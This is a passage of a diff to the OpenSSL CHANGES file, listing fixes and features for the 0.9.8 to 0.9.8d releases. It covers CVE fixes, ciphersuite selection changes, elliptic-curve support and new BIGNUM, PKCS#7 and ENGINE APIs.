+  *) Introduce limits to prevent malicious keys being able to
+     cause a denial of service.  (CVE-2006-2940)
+     [Steve Henson, Bodo Moeller]
+
+  *) Fix ASN.1 parsing of certain invalid structures that can result
+     in a denial of service.  (CVE-2006-2937)  [Steve Henson]
+
+  *) Fix buffer overflow in SSL_get_shared_ciphers() function. 
+     (CVE-2006-3738) [Tavis Ormandy and Will Drewry, Google Security Team]
+
+  *) Fix SSL client code which could crash if connecting to a
+     malicious SSLv2 server.  (CVE-2006-4343)
+     [Tavis Ormandy and Will Drewry, Google Security Team]
+
+  *) Since 0.9.8b, ciphersuite strings naming explicit ciphersuites
+     match only those.  Before that, "AES256-SHA" would be interpreted
+     as a pattern and match "AES128-SHA" too (since AES128-SHA got
+     the same strength classification in 0.9.7h) as we currently only
+     have a single AES bit in the ciphersuite description bitmap.
+     That change, however, also applied to ciphersuite strings such as
+     "RC4-MD5" that intentionally matched multiple ciphersuites --
+     namely, SSL 2.0 ciphersuites in addition to the more common ones
+     from SSL 3.0/TLS 1.0.
+
+     So we change the selection algorithm again: Naming an explicit
+     ciphersuite selects this one ciphersuite, and any other similar
+     ciphersuite (same bitmap) from *other* protocol versions.
+     Thus, "RC4-MD5" again will properly select both the SSL 2.0
+     ciphersuite and the SSL 3.0/TLS 1.0 ciphersuite.
+
+     Since SSL 2.0 does not have any ciphersuites for which the
+     128/256 bit distinction would be relevant, this works for now.
+     The proper fix will be to use different bits for AES128 and
+     AES256, which would have avoided the problems from the beginning;
+     however, bits are scarce, so we can only do this in a new release
+     (not just a patchlevel) when we can change the SSL_CIPHER
+     definition to split the single 'unsigned long mask' bitmap into
+     multiple values to extend the available space.
+
+     [Bodo Moeller]
+
+ Changes between 0.9.8b and 0.9.8c  [05 Sep 2006]
+
+  *) Avoid PKCS #1 v1.5 signature attack discovered by Daniel Bleichenbacher
+     (CVE-2006-4339)  [Ben Laurie and Google Security Team]
+
+  *) Add AES IGE and biIGE modes.
+     [Ben Laurie]
+
+  *) Change the Unix randomness entropy gathering to use poll() when
+     possible instead of select(), since the latter has some
+     undesirable limitations.
+     [Darryl Miles via Richard Levitte and Bodo Moeller]
+
+  *) Disable "ECCdraft" ciphersuites more thoroughly.  Now special
+     treatment in ssl/ssl_ciph.s makes sure that these ciphersuites
+     cannot be implicitly activated as part of, e.g., the "AES" alias.
+     However, please upgrade to OpenSSL 0.9.9[-dev] for
+     non-experimental use of the ECC ciphersuites to get TLS extension
+     support, which is required for curve and point format negotiation
+     to avoid potential handshake problems.
+     [Bodo Moeller]
+
+  *) Disable rogue ciphersuites:
+
+      - SSLv2 0x08 0x00 0x80 ("RC4-64-MD5")
+      - SSLv3/TLSv1 0x00 0x61 ("EXP1024-RC2-CBC-MD5")
+      - SSLv3/TLSv1 0x00 0x60 ("EXP1024-RC4-MD5")
+
+     The latter two were purportedly from
+     draft-ietf-tls-56-bit-ciphersuites-0[01].txt, but do not really
+     appear there.
+
+     Also deactivate the remaining ciphersuites from
+     draft-ietf-tls-56-bit-ciphersuites-01.txt.  These are just as
+     unofficial, and the ID has long expired.
+     [Bodo Moeller]
+
+  *) Fix RSA blinding Heisenbug (problems sometimes occured on
+     dual-core machines) and other potential thread-safety issues.
+     [Bodo Moeller]
+
+  *) Add the symmetric cipher Camellia (128-bit, 192-bit, 256-bit key
+     versions), which is now available for royalty-free use
+     (see http://info.isl.ntt.co.jp/crypt/eng/info/chiteki.html).
+     Also, add Camellia TLS ciphersuites from RFC 4132.
+
+     To minimize changes between patchlevels in the OpenSSL 0.9.8
+     series, Camellia remains excluded from compilation unless OpenSSL
+     is configured with 'enable-camellia'.
+     [NTT]
+
+  *) Disable the padding bug check when compression is in use. The padding
+     bug check assumes the first packet is of even length, this is not
+     necessarily true if compresssion is enabled and can result in false
+     positives causing handshake failure. The actual bug test is ancient
+     code so it is hoped that implementations will either have fixed it by
+     now or any which still have the bug do not support compression.
+     [Steve Henson]
+
+ Changes between 0.9.8a and 0.9.8b  [04 May 2006]
+
+  *) When applying a cipher rule check to see if string match is an explicit
+     cipher suite and only match that one cipher suite if it is.
+     [Steve Henson]
+
+  *) Link in manifests for VC++ if needed.
+     [Austin Ziegler <halostatue@gmail.com>]
+
+  *) Update support for ECC-based TLS ciphersuites according to
+     draft-ietf-tls-ecc-12.txt with proposed changes (but without
+     TLS extensions, which are supported starting with the 0.9.9
+     branch, not in the OpenSSL 0.9.8 branch).
+     [Douglas Stebila]
+
+  *) New functions EVP_CIPHER_CTX_new() and EVP_CIPHER_CTX_free() to support
+     opaque EVP_CIPHER_CTX handling.
+     [Steve Henson]
+
+  *) Fixes and enhancements to zlib compression code. We now only use
+     "zlib1.dll" and use the default __cdecl calling convention on Win32
+     to conform with the standards mentioned here:
+           http://www.zlib.net/DLL_FAQ.txt
+     Static zlib linking now works on Windows and the new --with-zlib-include
+     --with-zlib-lib options to Configure can be used to supply the location
+     of the headers and library. Gracefully handle case where zlib library
+     can't be loaded.
+     [Steve Henson]
+
+  *) Several fixes and enhancements to the OID generation code. The old code
+     sometimes allowed invalid OIDs (1.X for X >= 40 for example), couldn't
+     handle numbers larger than ULONG_MAX, truncated printing and had a
+     non standard OBJ_obj2txt() behaviour.
+     [Steve Henson]
+
+  *) Add support for building of engines under engine/ as shared libraries
+     under VC++ build system.
+     [Steve Henson]
+
+  *) Corrected the numerous bugs in the Win32 path splitter in DSO.
+     Hopefully, we will not see any false combination of paths any more.
+     [Richard Levitte]
+
+ Changes between 0.9.8 and 0.9.8a  [11 Oct 2005]
+
+  *) Remove the functionality of SSL_OP_MSIE_SSLV2_RSA_PADDING
+     (part of SSL_OP_ALL).  This option used to disable the
+     countermeasure against man-in-the-middle protocol-version
+     rollback in the SSL 2.0 server implementation, which is a bad
+     idea.  (CVE-2005-2969)
+
+     [Bodo Moeller; problem pointed out by Yutaka Oiwa (Research Center
+     for Information Security, National Institute of Advanced Industrial
+     Science and Technology [AIST], Japan)]
+
+  *) Add two function to clear and return the verify parameter flags.
+     [Steve Henson]
+
+  *) Keep cipherlists sorted in the source instead of sorting them at
+     runtime, thus removing the need for a lock.
+     [Nils Larsch]
+
+  *) Avoid some small subgroup attacks in Diffie-Hellman.
+     [Nick Mathewson and Ben Laurie]
+
+  *) Add functions for well-known primes.
+     [Nick Mathewson]
+
+  *) Extended Windows CE support.
+     [Satoshi Nakamura and Andy Polyakov]
+
+  *) Initialize SSL_METHOD structures at compile time instead of during
+     runtime, thus removing the need for a lock.
+     [Steve Henson]
+
+  *) Make PKCS7_decrypt() work even if no certificate is supplied by
+     attempting to decrypt each encrypted key in turn. Add support to
+     smime utility.
+     [Steve Henson]
+
+ Changes between 0.9.7h and 0.9.8  [05 Jul 2005]
+
+  [NB: OpenSSL 0.9.7i and later 0.9.7 patch levels were released after
+  OpenSSL 0.9.8.]
+
+  *) Add libcrypto.pc and libssl.pc for those who feel they need them.
+     [Richard Levitte]
+
+  *) Change CA.sh and CA.pl so they don't bundle the CSR and the private
+     key into the same file any more.
+     [Richard Levitte]
+
+  *) Add initial support for Win64, both IA64 and AMD64/x64 flavors.
+     [Andy Polyakov]
+
+  *) Add -utf8 command line and config file option to 'ca'.
+     [Stefan <stf@udoma.org]
+
+  *) Removed the macro des_crypt(), as it seems to conflict with some
+     libraries.  Use DES_crypt().
+     [Richard Levitte]
+
+  *) Correct naming of the 'chil' and '4758cca' ENGINEs. This
+     involves renaming the source and generated shared-libs for
+     both. The engines will accept the corrected or legacy ids
+     ('ncipher' and '4758_cca' respectively) when binding. NB,
+     this only applies when building 'shared'.
+     [Corinna Vinschen <vinschen@redhat.com> and Geoff Thorpe]
+
+  *) Add attribute functions to EVP_PKEY structure. Modify
+     PKCS12_create() to recognize a CSP name attribute and
+     use it. Make -CSP option work again in pkcs12 utility.
+     [Steve Henson]
+
+  *) Add new functionality to the bn blinding code:
+     - automatic re-creation of the BN_BLINDING parameters after
+       a fixed number of uses (currently 32)
+     - add new function for parameter creation
+     - introduce flags to control the update behaviour of the
+       BN_BLINDING parameters
+     - hide BN_BLINDING structure
+     Add a second BN_BLINDING slot to the RSA structure to improve
+     performance when a single RSA object is shared among several
+     threads.
+     [Nils Larsch]
+
+  *) Add support for DTLS.
+     [Nagendra Modadugu <nagendra@cs.stanford.edu> and Ben Laurie]
+
+  *) Add support for DER encoded private keys (SSL_FILETYPE_ASN1)
+     to SSL_CTX_use_PrivateKey_file() and SSL_use_PrivateKey_file()
+     [Walter Goulet]
+
+  *) Remove buggy and incompletet DH cert support from
+     ssl/ssl_rsa.c and ssl/s3_both.c
+     [Nils Larsch]
+
+  *) Use SHA-1 instead of MD5 as the default digest algorithm for
+     the apps/openssl applications.
+     [Nils Larsch]
+
+  *) Compile clean with "-Wall -Wmissing-prototypes
+     -Wstrict-prototypes -Wmissing-declarations -Werror". Currently
+     DEBUG_SAFESTACK must also be set.
+     [Ben Laurie]
+
+  *) Change ./Configure so that certain algorithms can be disabled by default.
+     The new counterpiece to "no-xxx" is "enable-xxx".
+
+     The patented RC5 and MDC2 algorithms will now be disabled unless
+     "enable-rc5" and "enable-mdc2", respectively, are specified.
+
+     (IDEA remains enabled despite being patented.  This is because IDEA
+     is frequently required for interoperability, and there is no license
+     fee for non-commercial use.  As before, "no-idea" can be used to
+     avoid this algorithm.)
+
+     [Bodo Moeller]
+
+  *) Add processing of proxy certificates (see RFC 3820).  This work was
+     sponsored by KTH (The Royal Institute of Technology in Stockholm) and
+     EGEE (Enabling Grids for E-science in Europe).
+     [Richard Levitte]
+
+  *) RC4 performance overhaul on modern architectures/implementations, such
+     as Intel P4, IA-64 and AMD64.
+     [Andy Polyakov]
+
+  *) New utility extract-section.pl. This can be used specify an alternative
+     section number in a pod file instead of having to treat each file as
+     a separate case in Makefile. This can be done by adding two lines to the
+     pod file:
+
+     =for comment openssl_section:XXX
+
+     The blank line is mandatory.
+
+     [Steve Henson]
+
+  *) New arguments -certform, -keyform and -pass for s_client and s_server
+     to allow alternative format key and certificate files and passphrase
+     sources.
+     [Steve Henson]
+
+  *) New structure X509_VERIFY_PARAM which combines current verify parameters,
+     update associated structures and add various utility functions.
+
+     Add new policy related verify parameters, include policy checking in 
+     standard verify code. Enhance 'smime' application with extra parameters
+     to support policy checking and print out.
+     [Steve Henson]
+
+  *) Add a new engine to support VIA PadLock ACE extensions in the VIA C3
+     Nehemiah processors. These extensions support AES encryption in hardware
+     as well as RNG (though RNG support is currently disabled).
+     [Michal Ludvig <michal@logix.cz>, with help from Andy Polyakov]
+
+  *) Deprecate BN_[get|set]_params() functions (they were ignored internally).
+     [Geoff Thorpe]
+
+  *) New FIPS 180-2 algorithms, SHA-224/-256/-384/-512 are implemented.
+     [Andy Polyakov and a number of other people]
+
+  *) Improved PowerPC platform support. Most notably BIGNUM assembler
+     implementation contributed by IBM.
+     [Suresh Chari, Peter Waltenberg, Andy Polyakov]
+
+  *) The new 'RSA_generate_key_ex' function now takes a BIGNUM for the public
+     exponent rather than 'unsigned long'. There is a corresponding change to
+     the new 'rsa_keygen' element of the RSA_METHOD structure.
+     [Jelte Jansen, Geoff Thorpe]
+
+  *) Functionality for creating the initial serial number file is now
+     moved from CA.pl to the 'ca' utility with a new option -create_serial.
+
+     (Before OpenSSL 0.9.7e, CA.pl used to initialize the serial
+     number file to 1, which is bound to cause problems.  To avoid
+     the problems while respecting compatibility between different 0.9.7
+     patchlevels, 0.9.7e  employed 'openssl x509 -next_serial' in
+     CA.pl for serial number initialization.  With the new release 0.9.8,
+     we can fix the problem directly in the 'ca' utility.)
+     [Steve Henson]
+
+  *) Reduced header interdepencies by declaring more opaque objects in
+     ossl_typ.h. As a consequence, including some headers (eg. engine.h) will
+     give fewer recursive includes, which could break lazy source code - so
+     this change is covered by the OPENSSL_NO_DEPRECATED symbol. As always,
+     developers should define this symbol when building and using openssl to
+     ensure they track the recommended behaviour, interfaces, [etc], but
+     backwards-compatible behaviour prevails when this isn't defined.
+     [Geoff Thorpe]
+
+  *) New function X509_POLICY_NODE_print() which prints out policy nodes.
+     [Steve Henson]
+
+  *) Add new EVP function EVP_CIPHER_CTX_rand_key and associated functionality.
+     This will generate a random key of the appropriate length based on the 
+     cipher context. The EVP_CIPHER can provide its own random key generation
+     routine to support keys of a specific form. This is used in the des and 
+     3des routines to generate a key of the correct parity. Update S/MIME
+     code to use new functions and hence generate correct parity DES keys.
+     Add EVP_CHECK_DES_KEY #define to return an error if the key is not 
+     valid (weak or incorrect parity).
+     [Steve Henson]
+
+  *) Add a local set of CRLs that can be used by X509_verify_cert() as well
+     as looking them up. This is useful when the verified structure may contain
+     CRLs, for example PKCS#7 signedData. Modify PKCS7_verify() to use any CRLs
+     present unless the new PKCS7_NO_CRL flag is asserted.
+     [Steve Henson]
+
+  *) Extend ASN1 oid configuration module. It now additionally accepts the
+     syntax:
+
+     shortName = some long name, 1.2.3.4
+     [Steve Henson]
+
+  *) Reimplemented the BN_CTX implementation. There is now no more static
+     limitation on the number of variables it can handle nor the depth of the
+     "stack" handling for BN_CTX_start()/BN_CTX_end() pairs. The stack
+     information can now expand as required, and rather than having a single
+     static array of bignums, BN_CTX now uses a linked-list of such arrays
+     allowing it to expand on demand whilst maintaining the usefulness of
+     BN_CTX's "bundling".
+     [Geoff Thorpe]
+
+  *) Add a missing BN_CTX parameter to the 'rsa_mod_exp' callback in RSA_METHOD
+     to allow all RSA operations to function using a single BN_CTX.
+     [Geoff Thorpe]
+
+  *) Preliminary support for certificate policy evaluation and checking. This
+     is initially intended to pass the tests outlined in "Conformance Testing
+     of Relying Party Client Certificate Path Processing Logic" v1.07.
+     [Steve Henson]
+
+  *) bn_dup_expand() has been deprecated, it was introduced in 0.9.7 and
+     remained unused and not that useful. A variety of other little bignum
+     tweaks and fixes have also been made continuing on from the audit (see
+     below).
+     [Geoff Thorpe]
+
+  *) Constify all or almost all d2i, c2i, s2i and r2i functions, along with
+     associated ASN1, EVP and SSL functions and old ASN1 macros.
+     [Richard Levitte]
+
+  *) BN_zero() only needs to set 'top' and 'neg' to zero for correct results,
+     and this should never fail. So the return value from the use of
+     BN_set_word() (which can fail due to needless expansion) is now deprecated;
+     if OPENSSL_NO_DEPRECATED is defined, BN_zero() is a void macro.
+     [Geoff Thorpe]
+
+  *) BN_CTX_get() should return zero-valued bignums, providing the same
+     initialised value as BN_new().
+     [Geoff Thorpe, suggested by Ulf Möller]
+
+  *) Support for inhibitAnyPolicy certificate extension.
+     [Steve Henson]
+
+  *) An audit of the BIGNUM code is underway, for which debugging code is
+     enabled when BN_DEBUG is defined. This makes stricter enforcements on what
+     is considered valid when processing BIGNUMs, and causes execution to
+     assert() when a problem is discovered. If BN_DEBUG_RAND is defined,
+     further steps are taken to deliberately pollute unused data in BIGNUM
+     structures to try and expose faulty code further on. For now, openssl will
+     (in its default mode of operation) continue to tolerate the inconsistent
+     forms that it has tolerated in the past, but authors and packagers should
+     consider trying openssl and their own applications when compiled with
+     these debugging symbols defined. It will help highlight potential bugs in
+     their own code, and will improve the test coverage for OpenSSL itself. At
+     some point, these tighter rules will become openssl's default to improve
+     maintainability, though the assert()s and other overheads will remain only
+     in debugging configurations. See bn.h for more details.
+     [Geoff Thorpe, Nils Larsch, Ulf Möller]
+
+  *) BN_CTX_init() has been deprecated, as BN_CTX is an opaque structure
+     that can only be obtained through BN_CTX_new() (which implicitly
+     initialises it). The presence of this function only made it possible
+     to overwrite an existing structure (and cause memory leaks).
+     [Geoff Thorpe]
+
+  *) Because of the callback-based approach for implementing LHASH as a
+     template type, lh_insert() adds opaque objects to hash-tables and
+     lh_doall() or lh_doall_arg() are typically used with a destructor callback
+     to clean up those corresponding objects before destroying the hash table
+     (and losing the object pointers). So some over-zealous constifications in
+     LHASH have been relaxed so that lh_insert() does not take (nor store) the
+     objects as "const" and the lh_doall[_arg] callback wrappers are not
+     prototyped to have "const" restrictions on the object pointers they are
+     given (and so aren't required to cast them away any more).
+     [Geoff Thorpe]
+
+  *) The tmdiff.h API was so ugly and minimal that our own timing utility
+     (speed) prefers to use its own implementation. The two implementations
+     haven't been consolidated as yet (volunteers?) but the tmdiff API has had
+     its object type properly exposed (MS_TM) instead of casting to/from "char
+     *". This may still change yet if someone realises MS_TM and "ms_time_***"
+     aren't necessarily the greatest nomenclatures - but this is what was used
+     internally to the implementation so I've used that for now.
+     [Geoff Thorpe]
+
+  *) Ensure that deprecated functions do not get compiled when
+     OPENSSL_NO_DEPRECATED is defined. Some "openssl" subcommands and a few of
+     the self-tests were still using deprecated key-generation functions so
+     these have been updated also.
+     [Geoff Thorpe]
+
+  *) Reorganise PKCS#7 code to separate the digest location functionality
+     into PKCS7_find_digest(), digest addtion into PKCS7_bio_add_digest().
+     New function PKCS7_set_digest() to set the digest type for PKCS#7
+     digestedData type. Add additional code to correctly generate the
+     digestedData type and add support for this type in PKCS7 initialization
+     functions.
+     [Steve Henson]
+
+  *) New function PKCS7_set0_type_other() this initializes a PKCS7 
+     structure of type "other".
+     [Steve Henson]
+
+  *) Fix prime generation loop in crypto/bn/bn_prime.pl by making
+     sure the loop does correctly stop and breaking ("division by zero")
+     modulus operations are not performed. The (pre-generated) prime
+     table crypto/bn/bn_prime.h was already correct, but it could not be
+     re-generated on some platforms because of the "division by zero"
+     situation in the script.
+     [Ralf S. Engelschall]
+
+  *) Update support for ECC-based TLS ciphersuites according to
+     draft-ietf-tls-ecc-03.txt: the KDF1 key derivation function with
+     SHA-1 now is only used for "small" curves (where the
+     representation of a field element takes up to 24 bytes); for
+     larger curves, the field element resulting from ECDH is directly
+     used as premaster secret.
+     [Douglas Stebila (Sun Microsystems Laboratories)]
+
+  *) Add code for kP+lQ timings to crypto/ec/ectest.c, and add SEC2
+     curve secp160r1 to the tests.
+     [Douglas Stebila (Sun Microsystems Laboratories)]
+
+  *) Add the possibility to load symbols globally with DSO.
+     [Götz Babin-Ebell <babin-ebell@trustcenter.de> via Richard Levitte]
+
+  *) Add the functions ERR_set_mark() and ERR_pop_to_mark() for better
+     control of the error stack.
+     [Richard Levitte]
+
+  *) Add support for STORE in ENGINE.
+     [Richard Levitte]
+
+  *) Add the STORE type.  The intention is to provide a common interface
+     to certificate and key stores, be they simple file-based stores, or
+     HSM-type store, or LDAP stores, or...
+     NOTE: The code is currently UNTESTED and isn't really used anywhere.
+     [Richard Levitte]
+
+  *) Add a generic structure called OPENSSL_ITEM.  This can be used to
+     pass a list of arguments to any function as well as provide a way
+     for a function to pass data back to the caller.
+     [Richard Levitte]
+
+  *) Add the functions BUF_strndup() and BUF_memdup().  BUF_strndup()
+     works like BUF_strdup() but can be used to duplicate a portion of
+     a string.  The copy gets NUL-terminated.  BUF_memdup() duplicates
+     a memory area.
+     [Richard Levitte]
+
+  *) Add the function sk_find_ex() which works like sk_find(), but will
+     return an index to an element even if an exact match couldn't be
+     found.  The index is guaranteed to point at the element where the
+     searched-for key would be inserted to preserve sorting order.
+     [Richard Levitte]
+
+  *) Add the function OBJ_bsearch_ex() which works like OBJ_bsearch() but
+     takes an extra flags argument for optional functionality.  Currently,
+     the following flags are defined:
+
+	OBJ_BSEARCH_VALUE_ON_NOMATCH
+	This one gets OBJ_bsearch_ex() to return a pointer to the first
+	element where the comparing function returns a negative or zero
+	number.
+
+	OBJ_BSEARCH_FIRST_VALUE_ON_MATCH
+	This one gets OBJ_bsearch_ex() to return a pointer to the first
+	element where the comparing function returns zero.  This is useful
+	if there are more than one element where the comparing function
+	returns zero.
+     [Richard Levitte]
+
+  *) Make it possible to create self-signed certificates with 'openssl ca'
+     in such a way that the self-signed certificate becomes part of the
+     CA database and uses the same mechanisms for serial number generation
+     as all other certificate signing.  The new flag '-selfsign' enables
+     this functionality.  Adapt CA.sh and CA.pl.in.
+     [Richard Levitte]
+
+  *) Add functionality to check the public key of a certificate request
+     against a given private.  This is useful to check that a certificate
+     request can be signed by that key (self-signing).
+     [Richard Levitte]
+
+  *) Make it possible to have multiple active certificates with the same
+     subject in the CA index file.  This is done only if the keyword
+     'unique_subject' is set to 'no' in the main CA section (default
+     if 'CA_default') of the configuration file.  The value is saved
+     with the database itself in a separate index attribute file,
+     named like the index file with '.attr' appended to the name.
+     [Richard Levitte]
+
+  *) Generate muti valued AVAs using '+' notation in config files for
+     req and dirName.
+     [Steve Henson]
+
+  *) Support for nameConstraints certificate extension.
+     [Steve Henson]
+
+  *) Support for policyConstraints certificate extension.
+     [Steve Henson]
+
+  *) Support for policyMappings certificate extension.
+     [Steve Henson]
+
+  *) Make sure the default DSA_METHOD implementation only uses its
+     dsa_mod_exp() and/or bn_mod_exp() handlers if they are non-NULL,
+     and change its own handlers to be NULL so as to remove unnecessary
+     indirection. This lets alternative implementations fallback to the
+     default implementation more easily.
+     [Geoff Thorpe]
+
+  *) Support for directoryName in GeneralName related extensions
+     in config files.
+     [Steve Henson]
+
+  *) Make it possible to link applications using Makefile.shared.
+     Make that possible even when linking against static libraries!
+     [Richard Levitte]
+
+  *) Support for single pass processing for S/MIME signing. This now
+     means that S/MIME signing can be done from a pipe, in addition
+     cleartext signing (multipart/signed type) is effectively streaming
+     and the signed data does not need to be all held in memory.
+
+     This is done with a new flag PKCS7_STREAM. When this flag is set
+     PKCS7_sign() only initializes the PKCS7 structure and the actual signing
+     is done after the data is output (and digests calculated) in
+     SMIME_write_PKCS7().
+     [Steve Henson]
+
+  *) Add full support for -rpath/-R, both in shared libraries and
+     applications, at least on the platforms where it's known how
+     to do it.
+     [Richard Levitte]
+
+  *) In crypto/ec/ec_mult.c, implement fast point multiplication with
+     precomputation, based on wNAF splitting: EC_GROUP_precompute_mult()
+     will now compute a table of multiples of the generator that
+     makes subsequent invocations of EC_POINTs_mul() or EC_POINT_mul()
+     faster (notably in the case of a single point multiplication,
+     scalar * generator).
+     [Nils Larsch, Bodo Moeller]
+
+  *) IPv6 support for certificate extensions. The various extensions
+     which use the IP:a.b.c.d can now take IPv6 addresses using the
+     formats of RFC1884 2.2 . IPv6 addresses are now also displayed
+     correctly.
+     [Steve Henson]
+
+  *) Added an ENGINE that implements RSA by performing private key
+     exponentiations with the GMP library. The conversions to and from
+     GMP's mpz_t format aren't optimised nor are any montgomery forms
+     cached, and on x86 it appears OpenSSL's own performance has caught up.
+     However there are likely to be other architectures where GMP could
+     provide a boost. This ENGINE is not built in by default, but it can be
+     specified at Configure time and should be accompanied by the necessary
+     linker additions, eg;
+         ./config -DOPENSSL_USE_GMP -lgmp
+     [Geoff Thorpe]
+
+  *) "openssl engine" will not display ENGINE/DSO load failure errors when
+     testing availability of engines with "-t" - the old behaviour is
+     produced by increasing the feature's verbosity with "-tt".
+     [Geoff Thorpe]
+
+  *) ECDSA routines: under certain error conditions uninitialized BN objects
+     could be freed. Solution: make sure initialization is performed early
+     enough. (Reported and fix supplied by Nils Larsch <nla@trustcenter.de>
+     via PR#459)
+     [Lutz Jaenicke]
+
+  *) Key-generation can now be implemented in RSA_METHOD, DSA_METHOD
+     and DH_METHOD (eg. by ENGINE implementations) to override the normal
+     software implementations. For DSA and DH, parameter generation can
+     also be overriden by providing the appropriate method callbacks.
+     [Geoff Thorpe]
+
+  *) Change the "progress" mechanism used in key-generation and
+     primality testing to functions that take a new BN_GENCB pointer in
+     place of callback/argument pairs. The new API functions have "_ex"
+     postfixes and the older functions are reimplemented as wrappers for
+     the new ones. The OPENSSL_NO_DEPRECATED symbol can be used to hide
+     declarations of the old functions to help (graceful) attempts to
+     migrate to the new functions. Also, the new key-generation API
+     functions operate on a caller-supplied key-structure and return
+     success/failure rather than returning a key or NULL - this is to
+     help make "keygen" another member function of RSA_METHOD etc.
+
+     Example for using the new callback interface:
+
+          int (*my_callback)(int a, int b, BN_GENCB *cb) = ...;
+          void *my_arg = ...;
+          BN_GENCB my_cb;
+
+          BN_GENCB_set(&my_cb, my_callback, my_arg);
+
+          return BN_is_prime_ex(some_bignum, BN_prime_checks, NULL, &cb);
+          /* For the meaning of a, b in calls to my_callback(), see the
+           * documentation of the function that calls the callback.
+           * cb will point to my_cb; my_arg can be retrieved as cb->arg.
+           * my_callback should return 1 if it wants BN_is_prime_ex()
+           * to continue, or 0 to stop.
+           */
+
+     [Geoff Thorpe]
+
+  *) Change the ZLIB compression method to be stateful, and make it
+     available to TLS with the number defined in 
+     draft-ietf-tls-compression-04.txt.
+     [Richard Levitte]
+
+  *) Add the ASN.1 structures and functions for CertificatePair, which
+     is defined as follows (according to X.509_4thEditionDraftV6.pdf):
+
+     CertificatePair ::= SEQUENCE {
+        forward		[0]	Certificate OPTIONAL,
+        reverse		[1]	Certificate OPTIONAL,
+        -- at least one of the pair shall be present -- }
+
+     Also implement the PEM functions to read and write certificate
+     pairs, and defined the PEM tag as "CERTIFICATE PAIR".
+
+     This needed to be defined, mostly for the sake of the LDAP
+     attribute crossCertificatePair, but may prove useful elsewhere as
+     well.
+     [Richard Levitte]
+
+  *) Make it possible to inhibit symlinking of shared libraries in
+     Makefile.shared, for Cygwin's sake.
+     [Richard Levitte]
+
+  *) Extend the BIGNUM API by creating a function 
+          void BN_set_negative(BIGNUM *a, int neg);
+     and a macro that behave like
+          int  BN_is_negative(const BIGNUM *a);
+
+     to avoid the need to access 'a->neg' directly in applications.
+     [Nils Larsch]
+
+  *) Implement fast modular reduction for pseudo-Mersenne primes
+     used in NIST curves (crypto/bn/bn_nist.c, crypto/ec/ecp_nist.c).
+     EC_GROUP_new_curve_GFp() will now automatically use this
+     if applicable.
+     [Nils Larsch <nla@trustcenter.de>]
+
+  *) Add new lock type (CRYPTO_LOCK_BN).
+     [Bodo Moeller]
+
+  *) Change the ENGINE framework to automatically load engines
+     dynamically from specific directories unless they could be
+     found to already be built in or loaded.  Move all the
+     current engines except for the cryptodev one to a new
+     directory engines/.
+     The engines in engines/ are built as shared libraries if
+     the "shared" options was given to ./Configure or ./config.
+     Otherwise, they are inserted in libcrypto.a.
+     /usr/local/ssl/engines is the default directory for dynamic
+     engines, but that can be overriden at configure time through
+     the usual use of --prefix and/or --openssldir, and at run
+     time with the environment variable OPENSSL_ENGINES.
+     [Geoff Thorpe and Richard Levitte]
+
+  *) Add Makefile.shared, a helper makefile to build shared
+     libraries.  Addapt Makefile.org.
+     [Richard Levitte]
+
+  *) Add version info to Win32 DLLs.
+     [Peter 'Luna' Runestig" <peter@runestig.com>]
+
+  *) Add new 'medium level' PKCS#12 API. Certificates and keys
+     can be added using this API to created arbitrary PKCS#12
+     files while avoiding the low level API.
+
+     New options to PKCS12_create(), key or cert can be NULL and
+     will then be omitted from the output file. The encryption
+     algorithm NIDs can be set to -1 for no encryption, the mac
+     iteration count can be set to 0 to omit the mac.
+
+     Enhance pkcs12 utility by making the -nokeys and -nocerts
+     options work when creating a PKCS#12 file. New option -nomac
+     to omit the mac, NONE can be set for an encryption algorithm.
+     New code is modified to use the enhanced PKCS12_create()
+     instead of the low level API.
+     [Steve Henson]
+
+  *) Extend ASN1 encoder to support indefinite length constructed
+     encoding. This can output sequences tags and octet strings in
+     this form. Modify pk7_asn1.c to support indefinite length
+     encoding. This is experimental and needs additional code to
+     be useful, such as an ASN1 bio and some enhanced streaming
+     PKCS#7 code.
+
+     Extend template encode functionality so that tagging is passed
+     down to the template encoder.
+     [Steve Henson]
+
+  *) Let 'openssl req' fail if an argument to '-newkey' is not
+     recognized instead of using RSA as a default.
+     [Bodo Moeller]
+
+  *) Add support for ECC-based ciphersuites from draft-ietf-tls-ecc-01.txt.
+     As these are not official, they are not included in "ALL";
+     the "ECCdraft" ciphersuite group alias can be used to select them.
+     [Vipul Gupta and Sumit Gupta (Sun Microsystems Laboratories)]
+
+  *) Add ECDH engine support.
+     [Nils Gura and Douglas Stebila (Sun Microsystems Laboratories)]
+
+  *) Add ECDH in new directory crypto/ecdh/.
+     [Douglas Stebila (Sun Microsystems Laboratories)]
+
+  *) Let BN_rand_range() abort with an error after 100 iterations
+     without success (which indicates a broken PRNG).
+     [Bodo Moeller]
+
+  *) Change BN_mod_sqrt() so that it verifies that the input value
+     is really the square of the return value.  (Previously,
+     BN_mod_sqrt would show GIGO behaviour.)
+     [Bodo Moeller]
+
+  *) Add named elliptic curves over binary fields from X9.62, SECG,
+     and WAP/WTLS; add OIDs that were still missing.
+
+     [Sheueling Chang Shantz and Douglas Stebila
+     (Sun Microsystems Laboratories)]
+
+  *) Extend the EC library for elliptic curves over binary fields
+     (new files ec2_smpl.c, ec2_smpt.c, ec2_mult.c in crypto/ec/).
+     New EC_METHOD:
+
+          EC_GF2m_simple_method
+
+     New API functions:
+
+          EC_GROUP_new_curve_GF2m
+          EC_GROUP_set_curve_GF2m
+          EC_GROUP_get_curve_GF2m
+          EC_POINT_set_affine_coordinates_GF2m
+          EC_POINT_get_affine_coordinates_GF2m
+          EC_POINT_set_compressed_coordinates_GF2m
+
+     Point compression for binary fields is disabled by default for
+     patent reasons (compile with OPENSSL_EC_BIN_PT_COMP defined to
+     enable it).
+
+     As binary polynomials are represented as BIGNUMs, various members
+     of the EC_GROUP and EC_POINT data structures can be shared
+     between the implementations for prime fields and binary fields;
+     the above ..._GF2m functions (except for EX_GROUP_new_curve_GF2m)
+     are essentially identical to their ..._GFp counterparts.
+     (For simplicity, the '..._GFp' prefix has been dropped from
+     various internal method names.)
+
+     An internal 'field_div' method (similar to 'field_mul' and
+     'field_sqr') has been added; this is used only for binary fields.
+
+     [Sheueling Chang Shantz and Douglas Stebila
+     (Sun Microsystems Laboratories)]
+
+  *) Optionally dispatch EC_POINT_mul(), EC_POINT_precompute_mult()
+     through methods ('mul', 'precompute_mult').
+
+     The generic implementations (now internally called 'ec_wNAF_mul'
+     and 'ec_wNAF_precomputed_mult') remain the default if these
+     methods are undefined.
+
+     [Sheueling Chang Shantz and Douglas Stebila
+     (Sun Microsystems Laboratories)]
+
